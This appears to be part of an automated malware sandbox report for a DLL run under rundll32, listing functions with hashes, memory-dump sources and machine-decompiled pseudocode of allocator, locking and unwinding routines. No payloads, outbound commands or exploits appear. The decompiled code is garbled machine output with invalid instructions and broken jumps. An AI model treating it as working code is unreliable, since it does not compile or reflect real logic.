                                                                                                                                              • String ID: MOZ_RELEASE_ASSERT(aBuffer.BufferLength().value() >= len)$MOZ_RELEASE_ASSERT(isSome())$MOZ_RELEASE_ASSERT(mCurrentSpan.LengthBytes() >= 1)
                                                                                                                                              • API String ID: 2882836952-3456298127
                                                                                                                                              • Opcode ID: f63d12288e605020e78e5252f2f45467deb734138ffdb6f0e29c827898fe75f9
                                                                                                                                              • Instruction ID: 76b65b11f9ec2842d8958710caff56e6a9db1165a382c128095f0ab3150dd9e6
                                                                                                                                              • Opcode Fuzzy Hash: f63d12288e605020e78e5252f2f45467deb734138ffdb6f0e29c827898fe75f9
                                                                                                                                              • Instruction Fuzzy Hash: ADC1BD72214B8882EB92DF15E4483DB77A4F789BD8F468216EB99477D6DF38C249C700
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180040660 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$ProtectVirtual$EnterInitializeLeave
                                                                                                                                              • String ID: MOZ_RELEASE_ASSERT(isSome())
                                                                                                                                              • API String ID: 4069880064-2302506790
                                                                                                                                              • Opcode ID: 931bc202708b8a1117d7ec95381e749d4044787566d65ca301a8b45895adaee8
                                                                                                                                              • Instruction ID: c89407aab64d6b2546ffaaec9e302abed9586af01052e7fdc2168bf30c67d294
                                                                                                                                              • Opcode Fuzzy Hash: 931bc202708b8a1117d7ec95381e749d4044787566d65ca301a8b45895adaee8
                                                                                                                                              • Instruction Fuzzy Hash: E9519232608BC885FBA2CB15E8447DAB7A0F7897D4F548005EAC913B99DF38C649CB40
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00000001800E9EA0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 107memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Virtual$ErrorLastProtectQuery
                                                                                                                                              • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                                                              • API String ID: 637304234-2123141913
                                                                                                                                              • Opcode ID: 4df2c2db8561729efbf3bc476df9e3ff3b2ce8b44e19cbdad741e54a792d1f7b
                                                                                                                                              • Instruction ID: 1e8721134ef49bc17405a901fc05387474fd4d0234d1420adfb66410d217e0d1
                                                                                                                                              • Opcode Fuzzy Hash: 4df2c2db8561729efbf3bc476df9e3ff3b2ce8b44e19cbdad741e54a792d1f7b
                                                                                                                                              • Instruction Fuzzy Hash: 41416F72305A0C81FAE68B85D8887E967A1F78DBD4F15C516EE4A937A5DE38CB49C300
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00000001800041E0 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 98COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              C-Code - Quality: 38%
                                                                                                                                              			E000000011800041E0(void* __edx, void* __rcx, void* __r8) {
				void* _v56;
				char _v64;
				void* _v72;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t29;
				long long _t45;
				long long _t46;
				long long _t47;
				intOrPtr* _t62;
				intOrPtr _t63;
				void* _t74;
				intOrPtr* _t76;
				signed long long _t79;
				void* _t81;
				signed int* _t82;

				_t79 =  &_v56;
				_t82 =  *0x8011f718; // 0x18017b428
				_v56 =  *_t82 ^ _t79;
				EnterCriticalSection(??);
				_t76 =  *0x8017cb90;
				if (_t76 == 0) goto 0x8000423a;
				_t45 =  *_t76;
				 *0x8017cb90 = _t45;
				LeaveCriticalSection(??);
				goto 0x8000425d;
				LeaveCriticalSection(??);
				 *((intOrPtr*)(_t45 - 0x77)) =  *((intOrPtr*)(_t45 - 0x77)) + _t26;
				asm("invalid");
				if (_t45 == 0) goto 0x8000435a;
				r8d = _t25;
				0x80003e20();
				EnterCriticalSection(??);
				if (_t25 == 0) goto 0x80004313;
				_t22 = E00000001180091B80(_t21,  &_v72);
				if (_v64 == 0) goto 0x8000438f;
				_t23 = E00000001180091B80(_t22,  &_v72);
				if (_v64 == 0) goto 0x8000438f;
				_t46 = _v72;
				if (_t46 == 0) goto 0x800042b0;
				_t62 =  *((intOrPtr*)(__rcx + 0x40));
				if (_t62 != 0) goto 0x800042e8;
				goto 0x8000430a;
				asm("o16 nop [eax+eax]");
				_t63 =  *_t62;
				if (_t63 == 0) goto 0x8000430a;
				_t74 =  >  ? 0xffffffff : 0;
				if (_t74 == 0xffffffff) goto 0x800042e0;
				if (_t74 == 0) goto 0x800042b0;
				if (( *(_t63 + 8) & 0xfffffffe) != 0) goto 0x800042e8;
				 *((long long*)(_t76 + 0x10)) = _t46;
				goto 0x80004327;
				_t47 =  *((intOrPtr*)(__rcx + 0x30));
				 *((long long*)(__rcx + 0x30)) = _t47 + 1;
				 *((long long*)(_t76 + 0x10)) = _t47;
				_t24 = E0000000118000B730(_t23, _t25, _t29, __rcx + 0x38, _t76, _t81);
				LeaveCriticalSection(??);
				if ( *_t82 != (_v56 ^ _t79)) goto 0x800043b0;
				return _t24;
			}























                                                                                                                                              0x1800041e9
                                                                                                                                              0x1800041f5
                                                                                                                                              0x180004203
                                                                                                                                              0x18000420f
                                                                                                                                              0x180004215
                                                                                                                                              0x18000421f
                                                                                                                                              0x180004221
                                                                                                                                              0x180004224
                                                                                                                                              0x180004232
                                                                                                                                              0x180004238
                                                                                                                                              0x180004241
                                                                                                                                              0x180004250
                                                                                                                                              0x180004253
                                                                                                                                              0x180004257
                                                                                                                                              0x180004263
                                                                                                                                              0x180004266
                                                                                                                                              0x18000426e
                                                                                                                                              0x180004276
                                                                                                                                              0x180004281
                                                                                                                                              0x18000428b
                                                                                                                                              0x1800042b3
                                                                                                                                              0x1800042bd
                                                                                                                                              0x1800042c3
                                                                                                                                              0x1800042cb
                                                                                                                                              0x1800042cd
                                                                                                                                              0x1800042d3
                                                                                                                                              0x1800042d5
                                                                                                                                              0x1800042d7
                                                                                                                                              0x1800042e0
                                                                                                                                              0x1800042e6
                                                                                                                                              0x1800042f1
                                                                                                                                              0x1800042f7
                                                                                                                                              0x1800042fb
                                                                                                                                              0x180004308
                                                                                                                                              0x18000430a
                                                                                                                                              0x180004311
                                                                                                                                              0x180004313
                                                                                                                                              0x18000431b
                                                                                                                                              0x18000431f
                                                                                                                                              0x18000432a
                                                                                                                                              0x180004332
                                                                                                                                              0x180004347
                                                                                                                                              0x180004359

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Leave$Enter
                                                                                                                                              • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                                              • API String ID: 2978645861-3894294050
                                                                                                                                              • Opcode ID: 3b30648458842c9849b5a118688601b1160a19961cfe261977b43a5672efe2b2
                                                                                                                                              • Instruction ID: 83d659c78e51659cfff2d131e603963d86f792b6c0c53b0f47091fd689784597
                                                                                                                                              • Opcode Fuzzy Hash: 3b30648458842c9849b5a118688601b1160a19961cfe261977b43a5672efe2b2
                                                                                                                                              • Instruction Fuzzy Hash: 87313872315A0881FAE6DB12E8587E933A1B78CBE4F449116ED9D0B7A4DF28C749C740
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180051A40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$CurrentProcess$EnterErrorFormatFreeInitializeLastLeaveLocalMessage
                                                                                                                                              • String ID: X
                                                                                                                                              • API String ID: 3772882749-3081909835
                                                                                                                                              • Opcode ID: dffe95b7ece3fdf0aa7aaa813adfed481804c2aad69191c3d24029114fdcce26
                                                                                                                                              • Instruction ID: b4ffd10f8e04c7993278a77c518935b43b06aad0d5b7da328352500180c8d645
                                                                                                                                              • Opcode Fuzzy Hash: dffe95b7ece3fdf0aa7aaa813adfed481804c2aad69191c3d24029114fdcce26
                                                                                                                                              • Instruction Fuzzy Hash: 5641A031218AC886FBA6CB25E8183DA77A0F75DB91F448025EA9907795DF7DC28DC740
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180007980 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 82COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Enter$Leave
                                                                                                                                              • String ID: MOZ_RELEASE_ASSERT(!aArena || node->mArena == aArena)$MOZ_RELEASE_ASSERT(node) (Double-free?)$MOZ_RELEASE_ASSERT(node->mArenaId == node->mArena->mId)
                                                                                                                                              • API String ID: 2801635615-2663259638
                                                                                                                                              • Opcode ID: e6b453de8ec819dc3a5ce2a96b9397e28c99b584c6181067592f924375f614c9
                                                                                                                                              • Instruction ID: 6767867ce232c30bc40cb1245559c0500ff16479b3acd3b53955f7f6af541e04
                                                                                                                                              • Opcode Fuzzy Hash: e6b453de8ec819dc3a5ce2a96b9397e28c99b584c6181067592f924375f614c9
                                                                                                                                              • Instruction Fuzzy Hash: 41314835711E0885EBA79B65E9483D973A0B75CBF0F04822ADE6D43BE5DF38D64A8301
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 000000018000E690 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 219threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentThread
                                                                                                                                              • String ID: MOZ_RELEASE_ASSERT(categoryPairIndex <= uint32_t(ProfilingCategoryPair::LAST))$MOZ_RELEASE_ASSERT(isSome())
                                                                                                                                              • API String ID: 2882836952-2736632048
                                                                                                                                              • Opcode ID: f7767bf1db4ccfb5d02cd0dc6adfe49fbfe448f1eaaae43f63430aac5d8a4f94
                                                                                                                                              • Instruction ID: 6936d480e80a0f6f5f5c87ba2e7fd947e8d172e722dae3c97bf5404595c27502
                                                                                                                                              • Opcode Fuzzy Hash: f7767bf1db4ccfb5d02cd0dc6adfe49fbfe448f1eaaae43f63430aac5d8a4f94
                                                                                                                                              • Instruction Fuzzy Hash: 30918B72A14BC886E796CF29E5443D977A0F359B98F089215EF8D03662DF78E2D9C700
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00000001800EB780 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 92COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Unwind
                                                                                                                                              • String ID: _Unwind_Resume$_Unwind_Resume() can't return$libunwind: %s - %s$libunwind: _Unwind_Resume(ex_obj=%p)
                                                                                                                                              • API String ID: 3419175465-3900785416
                                                                                                                                              • Opcode ID: cef8001379b0eac5287a2088146c43044493d0a5c1610cb3ce356593ecf9d211
                                                                                                                                              • Instruction ID: 8a7fa35adc32d5c7eb704b57673e7cbf641de218c5e0a0b30ad7380ba4cab832
                                                                                                                                              • Opcode Fuzzy Hash: cef8001379b0eac5287a2088146c43044493d0a5c1610cb3ce356593ecf9d211
                                                                                                                                              • Instruction Fuzzy Hash: 9F416231908BC891F6768B54E4167EAA374FBDD394F00A306EAC912B65EF79C2D6C740
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180005E20 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 140memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 0000000180005E41
                                                                                                                                              • VirtualFree.KERNEL32(?,?,?,?,000000018017B428,?,00000000,000000018017B428,00000000,?,00000000,?,00000001800020E1,00000000,?,?), ref: 0000000180005EFC
                                                                                                                                              • VirtualAlloc.KERNEL32(?,?,?,?,000000018017B428,?,00000000,000000018017B428,00000000,?,00000000,?,00000001800020E1,00000000,?,?), ref: 0000000180005FB2
                                                                                                                                              • LeaveCriticalSection.KERNEL32 ref: 0000000180005FFB
                                                                                                                                                • Part of subcall function 0000000180002190: EnterCriticalSection.KERNEL32 ref: 00000001800021E2
                                                                                                                                                • Part of subcall function 0000000180002190: LeaveCriticalSection.KERNEL32 ref: 00000001800024BA
                                                                                                                                                • Part of subcall function 0000000180002190: EnterCriticalSection.KERNEL32 ref: 00000001800024C7
                                                                                                                                                • Part of subcall function 0000000180002190: LeaveCriticalSection.KERNEL32 ref: 00000001800024EA
                                                                                                                                                • Part of subcall function 0000000180002190: EnterCriticalSection.KERNEL32 ref: 000000018000255D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Enter$Leave$Virtual$AllocFree
                                                                                                                                              • String ID: MOZ_CRASH()
                                                                                                                                              • API String ID: 415012217-2608361144
                                                                                                                                              • Opcode ID: 121375c5d10a5d7d5712163ea0d0c73c5e9b8563fd301596fd46b52edf36fdd0
                                                                                                                                              • Instruction ID: de253067ad3beb7d153997a433b8619c10b82ab853152493db7bc6b7b8ff4385
                                                                                                                                              • Opcode Fuzzy Hash: 121375c5d10a5d7d5712163ea0d0c73c5e9b8563fd301596fd46b52edf36fdd0
                                                                                                                                              • Instruction Fuzzy Hash: BD51A23175096942E7D3DB51AE083966695A70CBF0F548239ED6857BE8DF3CC64A9300
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180005D50 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 53memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Virtual$Free$Alloc
                                                                                                                                              • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                              • API String ID: 1852963964-2186867486
                                                                                                                                              • Opcode ID: e2a339b5ba2860af0b90d3513d1ba76337d6400a38dd3fbcc8dbcd0ab4e10f34
                                                                                                                                              • Instruction ID: 2c3054c28fdb093e13c7cacb14026c92548de11c427c1ef2153ec163adf3da77
                                                                                                                                              • Opcode Fuzzy Hash: e2a339b5ba2860af0b90d3513d1ba76337d6400a38dd3fbcc8dbcd0ab4e10f34
                                                                                                                                              • Instruction Fuzzy Hash: DD11847072092841F7EA97A7EC487D5169AAB4DFE4F44D029CC48477D4EDADCB4E8710
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00000001800EA0B0 Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 44COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                              • String ID: !dso || dso == &__dso_handle$../crt/tls_atexit.c$Address %p has no image-section
                                                                                                                                              • API String ID: 3168844106-3549013308
                                                                                                                                              • Opcode ID: 47a3a505050f0462c5887b7d2e898fbc76f62dfaf14400c40bf48f8ad66718bc
                                                                                                                                              • Instruction ID: d35e8d76d333b3033b9bd23c458ecea38dfc289da25c11922c1d1ab602aa8664
                                                                                                                                              • Opcode Fuzzy Hash: 47a3a505050f0462c5887b7d2e898fbc76f62dfaf14400c40bf48f8ad66718bc
                                                                                                                                              • Instruction Fuzzy Hash: 49012531704B5C91FA968B51EC883E52394B74EBA4F85C065EE4A67792DF38DB8DC340
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00000001800339E0 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 274threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              C-Code - Quality: 62%
                                                                                                                                              			E000000011800339E0(void* __ebx, void* __edx, void* __rcx, intOrPtr* __rdx, void* __r8) {
				signed int _v48;
				long long _v56;
				char _v72;
				long long _v80;
				void* _t37;
				void* _t46;
				void* _t47;
				void* _t48;
				void* _t55;
				intOrPtr _t73;
				long long* _t77;
				void* _t82;
				intOrPtr _t83;
				void* _t85;
				long long* _t93;
				intOrPtr* _t94;
				void* _t112;
				intOrPtr* _t113;
				void* _t114;
				intOrPtr _t115;
				void* _t117;
				void* _t118;
				long long _t119;
				void* _t121;
				signed long long _t124;
				void* _t127;
				void* _t129;
				signed int* _t130;
				void* _t132;

				_t47 = __ebx;
				if (_t37 - r8d < 0) goto 0x80033a48;
				_t113 = __rdx;
				_t83 =  *__rdx;
				if (_t37 - r8d < 0) goto 0x80033a69;
				_t84 =  >=  ? _t117 : _t83;
				_t55 =  >=  ? _t117 : _t83;
				if (_t55 == 0) goto 0x80033a21;
				r8d = __ebx;
				E00000001180023950(__edx, __rcx,  *((intOrPtr*)(__rdx + 8)));
				r8d = r8d - _t47;
				if (_t55 == 0) goto 0x80033a35;
				E00000001180023950(__edx, __rcx,  *((intOrPtr*)(_t113 + 0x18)));
				_t85 = _t82;
				_t114 = _t112;
				_t118 = _t117;
				_t129 = _t127;
				goto E00000001180026690;
				_t93 =  *0x8011f720; // 0x18017f798
				 *_t93 = "MOZ_RELEASE_ASSERT(aBytes <= RemainingBytes())";
				 *0 = 0x21f;
				0x8011d480();
				_t94 =  *0x8011f720; // 0x18017f798
				 *_t94 = "MOZ_RELEASE_ASSERT(aBytes <= aReader.RemainingBytes())";
				 *0 = 0x220;
				0x8011d480();
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t124 = _t121 - 0x28 + 0x28 - 0x50;
				_t130 =  *0x8011f718; // 0x18017b428
				_v48 =  *_t130 ^ _t124;
				if ( *((char*)( *_t94)) == 0) goto 0x80033bc3;
				_t115 =  *((intOrPtr*)(_t94 + 8));
				_t119 =  *((intOrPtr*)(_t115 + 0x88));
				_t73 =  *((intOrPtr*)(_t115 + 0x90));
				 *((long long*)(_t115 + 0x88)) = 0;
				if (_t73 == 0) goto 0x80033b4e;
				 *((long long*)(_t73 + 0x38)) = 0;
				_t86 =  *((intOrPtr*)(_t115 + 0x88));
				 *((long long*)(_t115 + 0x90)) =  *((intOrPtr*)(_t73 + 0x38));
				 *((long long*)(_t115 + 0x88)) =  *((intOrPtr*)(_t115 + 0x90));
				if ( *((intOrPtr*)(_t115 + 0x88)) == 0) goto 0x80033b1b;
				E00000001180023700( *((intOrPtr*)(_t115 + 0x88)));
				E00000001180004500( *((intOrPtr*)(_t115 + 0x88)), _t86);
				if ( *((char*)( *((intOrPtr*)(_t94 + 0x10)))) != 0) goto 0x80033b4e;
				 *((long long*)( *((intOrPtr*)(_t115 + 0x88)) + 0x28)) =  *((intOrPtr*)(_t115 + 0xa0));
				_t77 =  *((intOrPtr*)(_t115 + 0x88));
				 *((intOrPtr*)(_t115 + 0xa0)) =  *((intOrPtr*)(_t115 + 0xa0)) +  *((intOrPtr*)(_t77 + 0x20));
				 *_t77 = 0;
				_t24 =  &_v72; // 0x79
				E00000001180052CE0(1, _t24);
				 *((long long*)(_t119 + 0x18)) = _v56;
				asm("movups xmm0, [esp+0x30]");
				asm("movups [esi+0x8], xmm0");
				_v80 = _t119;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t115 + 0x78)))) + 0x30))(_t85, _t114, _t118, _t129, _t132);
				_t87 = _v80;
				_v80 = 0;
				if (_v80 == 0) goto 0x80033ba3;
				E00000001180023700(_v80);
				E00000001180004500(_v80, _t87);
				if ( *((long long*)(_t115 + 0x88)) == 0) goto 0x80033bb7;
				if ( *((long long*)(_t115 + 0x90)) != 0) goto 0x80033bc3;
				_t46 = E00000001180023380(_t48,  *((long long*)(_t115 + 0x90)), _t115,  *((intOrPtr*)(_t94 + 0x18)));
				if ( *_t130 != (_v48 ^ _t124)) goto 0x80033bdf;
				return _t46;
			}
































                                                                                                                                              0x1800339e0
                                                                                                                                              0x1800339f1
                                                                                                                                              0x1800339f6
                                                                                                                                              0x1800339f9
                                                                                                                                              0x180033a04
                                                                                                                                              0x180033a0b
                                                                                                                                              0x180033a0e
                                                                                                                                              0x180033a10
